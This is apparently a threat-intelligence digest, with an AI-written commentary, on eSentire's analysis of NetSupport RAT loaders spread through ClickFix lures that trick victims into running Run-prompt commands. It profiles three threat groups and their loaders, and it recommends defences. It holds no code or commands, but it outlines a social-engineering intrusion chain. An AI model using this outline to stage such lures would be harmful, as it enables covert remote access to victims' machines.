Unpacking NetSupport RAT Loaders Delivered via ClickFix

SUMMARY :

eSentire's Threat Response Unit observed multiple threat groups utilizing NetSupport Manager for malicious purposes throughout 2025. These groups have shifted from Fake Updates to ClickFix as their primary delivery method. The attack methodology involves social engineering victims to execute malicious commands in the Windows Run Prompt, leading to NetSupport extraction and execution. Three distinct threat groups were identified, each using different loaders and infrastructure. The groups are designated by their licensee names: EVALUSION, FSHGDREE32/SGI, and XMLCTL. The analysis includes details on the PowerShell/JSON-based loader, MSI-based loader, and NetSupport PCAP analysis. An unpacking utility and YARA rule are provided to aid researchers in detecting and analyzing NetSupport variants.

OPENCTI LABELS :

netsupport rat,clickfix,remote administration tools


AI COMMENTARY :

1. Introduction to NetSupport RAT and ClickFix Delivery Methods Throughout 2025, eSentire’s Threat Response Unit (TRU) observed a significant uptick in the use of NetSupport Manager as a foothold tool by multiple threat actors. Branded as a legitimate remote administration tool (RAT), NetSupport Manager has long been abused to maintain covert access to compromised environments. What sets this recent wave of attacks apart is the shift in delivery technique from generic fake software updates to a more targeted, socially engineered campaign dubbed “ClickFix.” This blog post unpacks how attackers leveraged ClickFix to deploy custom NetSupport loaders, profiles three distinct threat clusters, examines multiple loader types and PCAP data, and provides defensive countermeasures, including an unpacking utility and YARA rule.

2. Evolution from Fake Updates to ClickFix Early iterations of NetSupport RAT delivery relied on deceptive download prompts masquerading as security patches or software upgrades. By mid-2025, threat groups grew more sophisticated, embedding malicious payloads within a deceptive ClickFix interface. Victims receive a prompt urging them to type a system command into the Windows Run prompt under the guise of troubleshooting connectivity issues. Once executed, the command silently fetches and extracts a customized NetSupport Manager package. This refined social engineering ruse significantly improved loader execution rates and reduced detection by traditional security controls.

3. Attack Methodology Breakdown The ClickFix strategy revolves around human interaction and trust exploitation. Attackers first entice users via phishing emails or malicious advertisements claiming to resolve network or software problems. Upon user compliance, a run command is executed, which points to a remote server hosting the loader. This loader then unpacks and launches the NetSupport RAT binary, establishing persistent remote access. Throughout the process, network communications mimic legitimate remote administration traffic, complicating anomaly detection and attribution efforts.

4. Profiling the Three Distinct Threat Groups The TRU’s analysis identified three licensee-named clusters behind these campaigns: EVALUSION, FSHGDREE32/SGI, and XMLCTL. EVALUSION primarily leveraged a PowerShell/JSON-based loader, hosting configurations on dynamic web resources. FSHGDREE32/SGI preferred an MSI-based loader, bundling NetSupport within digitally signed installer packages. XMLCTL resorted to custom loader variants with unique obfuscation techniques and dedicated command-and-control (C2) servers. Each group’s infrastructure and operational tempos varied, yet they all converged on the NetSupport RAT framework to facilitate espionage and data exfiltration.

5. Loader Characteristics and PCAP Analysis The PowerShell/JSON loader employed by EVALUSION pulled a JSON payload containing encoded NetSupport binaries and execution parameters. MSI loaders from FSHGDREE32/SGI exploited Windows Installer’s native capabilities to evade manual inspection. XMLCTL’s loader introduced multi-stage unpacking routines and encrypted traffic channels. PCAP captures of NetSupport Manager sessions revealed standard protocol handshakes, encrypted command exchanges, and file transfer sequences. Researchers dissected these captures to identify consistent network fingerprints, which can be leveraged to flag anomalous remote administration sessions.

6. Unpacking Utility and YARA Rule for Detection To streamline reverse engineering efforts, the TRU developed a standalone unpacking utility capable of extracting NetSupport binaries from both PowerShell and MSI-based loaders. This tool automates deobfuscation and reconstructs original executable artifacts. Accompanying the utility is a YARA rule designed to detect loader artifacts based on unique string patterns, configuration markers, and binary signatures. Security teams can integrate these resources into analysis workflows to accelerate threat hunting and incident response against NetSupport-based intrusions.

7. Recommendations and Defensive Measures Defenders should enforce multi-factor authentication for remote administration tools and monitor for anomalous Windows Run prompt invocations. Email security gateways must be tuned to flag ClickFix-style social engineering lures. Network defenders can leverage identified PCAP indicators and the provided YARA rule to detect malicious NetSupport sessions. Finally, maintaining endpoint detection and response (EDR) solutions updated with the unpacking utility’s signatures will ensure rapid identification and containment of NetSupport RAT variants. By adopting these measures, organizations can mitigate the evolving threat posed by sophisticated RAT loaders delivered via ClickFix.


OPEN NETMANAGEIT OPENCTI REPORT LINK!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


Unpacking NetSupport RAT Loaders Delivered via ClickFix